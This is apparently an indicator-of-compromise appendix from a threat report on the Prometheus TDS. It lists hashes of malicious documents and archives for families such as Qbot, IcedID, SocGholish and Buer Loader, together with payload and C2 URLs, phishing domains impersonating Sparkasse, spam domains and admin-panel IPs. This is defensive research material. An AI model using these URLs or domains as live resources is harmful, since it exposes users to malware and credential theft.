0318_16237545349031.doc d66b30fbc8281f0c92407ddb3ef82658 8bb174b94349da541787548c06206a6f9f64f655 6c39a950e23ece571b1ed872a0e91ffde9f798e4f63522ee3ad7a24fe6ffcae5 http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0216_20539741697592.doc f542d8c7130e6e88715b51322c5ca8ee 9cae9d2f4d8b227312ba24bb8d575c323d44aaeb 32c9c4f6c67a8217019cfa4c3449e745cbcc52bcfd31e0ce71729b301660dc17 http://eviddinlahal.com/8/forum.php http://saisepsdrablis.ru/8/forum.php http://obvionsweyband.ru/8/forum.php
0406_88251355816452.doc f98badc4dbe19eddac7464bca1933067 a9b81030ab23c1afac3be8affe3787fc11b12a04 57596e1045ec19803b399e48e86dbac7525052512568c4ec20f22b98c173637b http://cametateleb.ru/8/forum.php http://polionallas.ru/8/forum.php http://divelerevol.com/8/forum.php
0318_89347818081491.doc 8c2d156c1483af54a589ca9a0888c9e2 adbe445a2d3cb076f143285a6a94157651714a12 8686d43c68b9803440d762d05e76a8fc1bea292b0c0cb725684884090ceefc20 http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0318_89347818081491.doc 8c2d156c1483af54a589ca9a0888c9e2 adbe445a2d3cb076f143285a6a94157651714a12 8686d43c68b9803440d762d05e76a8fc1bea292b0c0cb725684884090ceefc20 http://froursmonesed.com/8/forum.php http://abouniteta.ru/8/forum.php http://diverbsez.ru/8/forum.php
0211_21229305048201.doc 915d6e04ea8617fb5006f3edab547fde ae6b1ac9a4f944b677849b7df3a59e6e2436ab24 3e71b2006a44fa8edc6fcdd4afa6286e14ee812fa998632bb191c68a021a5536 http://nuencres.com/8/forum.php http://matuattheires.ru/8/forum.php http://desuctoette.ru/8/forum.php
0301_206410993.doc be2a8c8ba6a7874ff04b58b56c2e6a9e af30fe099d85c5f6612b8b9834b365bd0420815a 9262edb2a995d0e0e784d1eedcf42e382116399554db75032ab5ec8c8deb89c7 http://ementincied.com/8/forum.php http://watoredprocaus.ru/8/forum.php http://noriblerughly.ru/8/forum.php
0225_1746399001456.doc fbd1028c5c51003c11f6f12c0233ecf6 b284c6e17f75feb31a3bc6246e2fd84b7e20b9bb c5548c98f23542302840485f5170873824ffb5029464909e6d75a700be9b87b9 http://speritentz.com/8/forum.php http://afternearde.ru/8/forum.php http://counivicop.ru/8/forum.php
0210_4367220121562.doc f59f1f6d258323ff7ae1a0d8201e4348 be3effcb9069ac6d66256c8246fde33e55980403 c98990d05f745f21e96770571123c6a2651ee3d874af36d1747a2893b4c96412 http://shifiticans.com/8/forum.php http://anumessensan.ru/8/forum.php http://grectedparices.ru/8/forum.php
0208_4507371754789.doc 13efab9b32eab02313e4a722f7d0641f c90808c2c5ec20144946f639fdf4f71aa9c4c581 4f68b92f54f16dcb1e9b34229e7ed0d155aa3308aa02e5aaf09c915c03654e89 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0406_112731578493472.doc 364f80a5b16841597256388191a2981e d257de7c62bff91bdb58ef46091560f637b25d09 9d8038cd3b64b9f8907c8ba506f0f445a69590c9f37d3236c3ff4de94e1e01ac http://cametateleb.ru/8/forum.php http://polionallas.ru/8/forum.php http://divelerevol.com/8/forum.php
0208_52726880046401.doc 88d441d2d41cecbf700ed16d5437dd7a ef5d8322363833a1c8ab3e04280f9fd5df00e38c c5092251d9a2b6a2aa355c8bd807a3a2b722d290f6390d62c5688fd1b0513a74 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php
0208_52726880046401.doc 88d441d2d41cecbf700ed16d5437dd7a ef5d8322363833a1c8ab3e04280f9fd5df00e38c c5092251d9a2b6a2aa355c8bd807a3a2b722d290f6390d62c5688fd1b0513a74 http://satursed.com/8/forum.php http://sameastar.ru/8/forum.php http://ludiesibut.ru/8/forum.php

Qbot

Filename MD5 SHA1 SHA256 Malicious URL
document-12603942.xls 0e1134acbb0bc58770345c3874a80189 2d74e52ac0e3ebbf2bb4aabb6469cba9badd70eb 8932db61f72108f0af9267056e74b0e099470b27fe62f997ecd092db8db20945 https://aramiglobal.com/ds/0502.gif
document-348056604.xls 24f7520283e02868e262dc9d595c7540 db23b35b2c2b8bf413fb57ee9017127f651e0304 a5326a661319bd7a8ab027a22fb8bb0b0b6d027269c95ab24bee2da53b09b463 https://inpulsion.net/ds/0702.gif

IcedID

Filename MD5 SHA1 SHA256 Malicious URL
Documents_682784324_1073289308.xls 79af726897412573ba50ad5b9ad168f0 d396268c483bbb5bf5c23198be569c7ef93a0223 3041387a18df225d20b6564068f23adcb746f1560e9ae466c81163d96e46c258 http://denazao.info/images/1j.djvu (second stage) http://twotimercvac.uno/ (C2)

VBS Loader

Filename MD5 SHA1 SHA256 Malicious URL
kurt.troyer_8816201.zip 196ab58d25d3548c90472875a33743c6 58db5164840e053e7d20a136d4afdc9a3c4d6df2 16a5398065a79fa0ee83cb40444a0b31e838777a5c2638f1aa1e15b2ec9728c8 http://155.94.193.10/user/get/MaintainingFollowing1619186878
mike_5131337.zip 89ee343062cbb8e2fa70204cb0574b88 75f68a7de72c53fd87a6ff161e2b4dfe4273b647 5953e3aa6c6b1d7330f54e4fc92bee899ba6c109af173c975a57364253c60bbe http://155.94.193.10/user/get/ButPrinciple1619186669
jtorres_35107.zip ea967b761036ea62e17a3e1e8d9e6941 9bc673671d293d0787a77c8240bc8173ae68222c 2b7686542959ce1e6b355f46b7c0aafd6e19243d2cae4123c1f064e0deebfd58 http://155.94.193.10/user/get/workflowsFunctionalPrivateConstant1619186670

Buer Loader

Filename MD5 SHA1 SHA256 Malicious URL
document010498.zip c2263a4741865a59adbf94f6e8089b62 c2fe78d027669d8fafec394718baa37cac529177 e44d72b2e48262424c9f0c62a9e9fb532686edc1f8d6e5c94d8c94ef76afc3f4 secure-doc-viewer.com

SocGholish

Filename MD5 SHA1 SHA256 Malicious URL
Chrome.992d73.zip 60eea3a21bf7eda64e4dc09f490658da 4f5ac7c2f7097bbdcabfccb9a3a6bbbe99f929b7 14a2744c4278bfdc4197793f928a24fd1036f604e5e68a7e5473ce224a7f728f https://e186aeb2.news.pocketstay.com/1×1.gif
Chrome.Update.60bfbc.zip d32f0c13bd4041bd59fe4a3b6e1f5a24 68b9c9217d81afea86e40d8789f4cbdedcf50697 e54a05f127c3c775ce5a7163d37b98b289b4fe4cd11e58e2edc90aa2adc101e7 http://4107e577.payment.refinedwebs.com/1×1.gif

Fake VPN

Filename MD5 SHA1 SHA256 Malicious URL
Windscribe.exe a70ae53c00fb51ef317c045dd8066e17 f729b75d68824f200bebe3c3613c478f9d276501 1495500d6c8613fda22b0e0c8f2ab0ba5d244d6b166c5d854a47000a91f44ab1 https://huvpn.com/free-vpn/ (fake Windscribe website) https://windscribe.s3.us-east-2.amazonaws.com/Windscribe.exe (EXE download link)

Pharma spam

  • hotaiddeal.su
  • yourmedsquality.su
  • goodherbwebmart.com
  • ella.purecaremarket.su

Phishing websites

  • banking.sparkasse.de-id1897ajje9021ucn9021345345b0juah10zb1092uhda.xyz
  • banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
  • banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
  • banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
  • banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
  • banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
  • banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz

Other samples

MD5 SHA1 SHA256 Malicious URL
045c33237a9843a2ece09e00203f2368 76b375a2cf40ebbba72b0f622d2426d9ab86d443 cd4164aee2890fbdf1b61b3b09a37b8857f6b3c87ceef29a573d34782598d976 https://deciopywlon.com/
02aed8241295fbdb0a6393393f2eb688 74c1635011e4ce39205ee5884e22c96222d56cbb 53f16cc3aa9b674651f2e69e02f1c91849123e8a98cb7a850c56ed23c8e89efd http://195.123.241.180/kiytrscuvbuytnkudjvt/winshell.exe
bacb64855f41f9a29b7f1005dc8c7f33 89228658d3486902dd4bc1cd77b4565253ecad33 9c203cd2e56cce3e484bd447470c21cff9e9163ee4095d23413ecf6a81ec48c2 http://195.123.241.180/kiytrscuvbuytnkudjvt/winshell.exe
447bc4b2c75fd0ace42bd31b35f9f743 a20727101268130bf02fbef225481f6130c01582 c6677e676ec1049bb877a7ea6c424d7505e0b5ecfb4c1a2f049e008fb0eb17de https://maarselectrical.com/images/Menu/smcs.exe
3eb5461d2b200cce8e90c4c8db2fba96 a7aeb4a887810f978ffa91ca9ed890fe9279a465 858a42b43d4262aded023a166a01e6e43271b0a619e23b55da01694e3c9fe671 https://honeyminer.live/file/honeyminer.exe
ffcf6712b62b87f44bcd7b3662308c5a df5e7cd307451a6c1ba6c0bc8901d4119a7e387b 38713d11d588217d0e86ba3ea8a8dd550c368dad3b910a1aa72aa74fa325a7ae http://fyz10eijkl03mytjfb.com/index.gif

BRChecker Admin panel

109.248.11.85
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109

Prometheus TDS MITRE ATT&CK